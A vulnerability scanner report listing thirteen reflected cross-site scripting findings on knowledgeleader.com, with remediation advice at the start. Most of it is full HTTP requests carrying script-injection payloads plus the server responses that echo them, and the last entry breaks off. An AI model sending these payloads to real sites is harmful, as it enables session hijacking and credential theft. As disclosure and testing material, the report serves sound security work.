XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, knowledgeleader.com

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

1.1. http://www.knowledgeleader.com/ [name of an arbitrarily supplied request parameter] next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc547"><script>alert(1)</script>5db3f7146dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?bc547"><script>alert(1)</script>5db3f7146dc=1 HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:40:33 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 13120
Cache-control: no-cache
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:05:48 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="shortcut icon" href="/icons/KnowledgeLeader/Images/KL_Icon.ico">
<link rel="stylesheet" type="text/css" media="
...[SNIP]...
<a href="/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument?bc547"><script>alert(1)</script>5db3f7146dc=1&Login">
...[SNIP]...

1.2. http://www.knowledgeleader.com/KnowledgeLeader/ContactUs.nsf/Questions!OpenForm&header [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/ContactUs.nsf/Questions!OpenForm&header

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffa42"><script>alert(1)</script>f6937c5d084 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /KnowledgeLeaderffa42"><script>alert(1)</script>f6937c5d084/ContactUs.nsf/Questions!OpenForm&header HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
Referer: http://www.knowledgeleader.com/KnowledgeLeader/Registration.nsf/Registration!OpenForm&AccountType=Trial
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:47:02 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 13110
Cache-control: no-cache
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:12:17 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="shortcut icon" href="/icons/KnowledgeLeader/Images/KL_Icon.ico">
<link rel="stylesheet" type="text/css" media="
...[SNIP]...
<a href="/KnowledgeLeaderffa42"><script>alert(1)</script>f6937c5d084/ContactUs.nsf/Questions!OpenForm&header&Login">
...[SNIP]...

1.3. http://www.knowledgeleader.com/KnowledgeLeader/ContactUs.nsf/Questions!OpenForm&header [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/ContactUs.nsf/Questions!OpenForm&header

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db494"><script>alert(1)</script>b04302dc384 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /KnowledgeLeader/ContactUs.nsf/Questions!OpenFormdb494"><script>alert(1)</script>b04302dc384&header HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
Referer: http://www.knowledgeleader.com/KnowledgeLeader/Registration.nsf/Registration!OpenForm&AccountType=Trial
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:47:03 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 13110
Cache-control: no-cache
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:12:19 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="shortcut icon" href="/icons/KnowledgeLeader/Images/KL_Icon.ico">
<link rel="stylesheet" type="text/css" media="
...[SNIP]...
<a href="/KnowledgeLeader/ContactUs.nsf/Questions!OpenFormdb494"><script>alert(1)</script>b04302dc384&header&Login">
...[SNIP]...

1.4. http://www.knowledgeleader.com/KnowledgeLeader/ContactUs.nsf/Questions!OpenForm&header [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/ContactUs.nsf/Questions!OpenForm&header

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55b1c"><script>alert(1)</script>fd2547e3968 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /KnowledgeLeader/ContactUs.nsf/Questions!OpenForm&header?55b1c"><script>alert(1)</script>fd2547e3968=1 HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
Referer: http://www.knowledgeleader.com/KnowledgeLeader/Registration.nsf/Registration!OpenForm&AccountType=Trial
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:46:59 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 13113
Cache-control: no-cache
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:12:15 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="shortcut icon" href="/icons/KnowledgeLeader/Images/KL_Icon.ico">
<link rel="stylesheet" type="text/css" media="
...[SNIP]...
<a href="/KnowledgeLeader/ContactUs.nsf/Questions!OpenForm&header?55b1c"><script>alert(1)</script>fd2547e3968=1&Login">
...[SNIP]...

1.5. http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Content/AboutKLValueProposition!OpenDocument [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Content.nsf/Web+Content/AboutKLValueProposition!OpenDocument

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db3a3"><script>alert(1)</script>7ceb56d3f81 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /KnowledgeLeaderdb3a3"><script>alert(1)</script>7ceb56d3f81/Content.nsf/Web+Content/AboutKLValueProposition!OpenDocument HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
Referer: http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&header
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:47:26 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 13131
Cache-control: no-cache
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:12:41 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="shortcut icon" href="/icons/KnowledgeLeader/Images/KL_Icon.ico">
<link rel="stylesheet" type="text/css" media="
...[SNIP]...
<a href="/KnowledgeLeaderdb3a3"><script>alert(1)</script>7ceb56d3f81/Content.nsf/Web+Content/AboutKLValueProposition!OpenDocument&Login">
...[SNIP]...

1.6. http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Content/AboutKLValueProposition!OpenDocument [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Content.nsf/Web+Content/AboutKLValueProposition!OpenDocument

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1f72"><script>alert(1)</script>d3414c53f08 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /KnowledgeLeader/Content.nsf/Web+Contentd1f72"><script>alert(1)</script>d3414c53f08/AboutKLValueProposition!OpenDocument HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
Referer: http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&header
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:47:28 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 13198
Cache-control: no-cache
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:12:43 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="shortcut icon" href="/icons/KnowledgeLeader/Images/KL_Icon.ico">
<link rel="stylesheet" type="text/css" media="
...[SNIP]...
<a href="/KnowledgeLeader/Content.nsf/Web+Contentd1f72"><script>alert(1)</script>d3414c53f08/AboutKLValueProposition!OpenDocument&Login">
...[SNIP]...

1.7. http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Content/AboutKLValueProposition!OpenDocument [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Content.nsf/Web+Content/AboutKLValueProposition!OpenDocument

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46842"><script>alert(1)</script>06b130e611f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /KnowledgeLeader/Content.nsf/Web+Content/AboutKLValueProposition!OpenDocument46842"><script>alert(1)</script>06b130e611f HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
Referer: http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&header
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:47:29 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 13131
Cache-control: no-cache
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:12:44 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="shortcut icon" href="/icons/KnowledgeLeader/Images/KL_Icon.ico">
<link rel="stylesheet" type="text/css" media="
...[SNIP]...
<a href="/KnowledgeLeader/Content.nsf/Web+Content/AboutKLValueProposition!OpenDocument46842"><script>alert(1)</script>06b130e611f&Login">
...[SNIP]...

1.8. http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Content/AboutKLValueProposition!OpenDocument [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Content.nsf/Web+Content/AboutKLValueProposition!OpenDocument

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8ab0"><script>alert(1)</script>3c607c72578 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /KnowledgeLeader/Content.nsf/Web+Content/AboutKLValueProposition!OpenDocument?b8ab0"><script>alert(1)</script>3c607c72578=1 HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
Referer: http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&header
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:47:23 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 13134
Cache-control: no-cache
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:12:38 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="shortcut icon" href="/icons/KnowledgeLeader/Images/KL_Icon.ico">
<link rel="stylesheet" type="text/css" media="
...[SNIP]...
<a href="/KnowledgeLeader/Content.nsf/Web+Content/AboutKLValueProposition!OpenDocument?b8ab0"><script>alert(1)</script>3c607c72578=1&Login">
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&Login&header

Issue detail

The value of the %27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000EE)%3C/script%3E request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f175"><script>alert(1)</script>bb192fd390f was submitted in the %27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000EE)%3C/script%3E parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&Login&header?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000EE)%3C/script%3E5f175"><script>alert(1)</script>bb192fd390f HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:48:51 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 13209
Cache-control: no-cache
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:14:06 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="shortcut icon" href="/icons/KnowledgeLeader/Images/KL_Icon.ico">
<link rel="stylesheet" type="text/css" media="
...[SNIP]...
<a href="/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&Login&header?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000EE)%3C/script%3E5f175"><script>alert(1)</script>bb192fd390f&Login">
...[SNIP]...

1.10. http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&Login&header [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&Login&header

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5657f"><script>alert(1)</script>e76c65f267 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /KnowledgeLeader5657f"><script>alert(1)</script>e76c65f267/Content.nsf/Web+Content/Home+Page!OpenDocument&Login&header HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:40:55 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 13129
Cache-control: no-cache
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:06:11 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="shortcut icon" href="/icons/KnowledgeLeader/Images/KL_Icon.ico">
<link rel="stylesheet" type="text/css" media="
...[SNIP]...
<a href="/KnowledgeLeader5657f"><script>alert(1)</script>e76c65f267/Content.nsf/Web+Content/Home+Page!OpenDocument&Login&header&Login">
...[SNIP]...

1.11. http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&Login&header [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&Login&header

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da6be"><script>alert(1)</script>f68ee3ab935 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /KnowledgeLeader/Content.nsf/Web+Contentda6be"><script>alert(1)</script>f68ee3ab935/Home+Page!OpenDocument&Login&header?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000EE)%3C/script%3E HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:48:57 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 13209
Cache-control: no-cache
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:14:12 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="shortcut icon" href="/icons/KnowledgeLeader/Images/KL_Icon.ico">
<link rel="stylesheet" type="text/css" media="
...[SNIP]...
<a href="/KnowledgeLeader/Content.nsf/Web+Contentda6be"><script>alert(1)</script>f68ee3ab935/Home+Page!OpenDocument&Login&header?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000EE)%3C/script%3E&Login">
...[SNIP]...

1.12. http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&Login&header [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&Login&header

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98b9f"><script>alert(1)</script>9ea0f4f16e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument98b9f"><script>alert(1)</script>9ea0f4f16e&Login&header HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:40:59 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 13129
Cache-control: no-cache
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:06:15 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="shortcut icon" href="/icons/KnowledgeLeader/Images/KL_Icon.ico">
<link rel="stylesheet" type="text/css" media="
...[SNIP]...
<a href="/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument98b9f"><script>alert(1)</script>9ea0f4f16e&Login&header&Login">
...[SNIP]...

1.13. http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&Login&header [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&Login&header

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad6d8"><script>alert(1)</script>0caa93b4774 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&Login&header?ad6d8"><script>alert(1)</script>0caa93b4774=1 HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 500 Internal Server Error
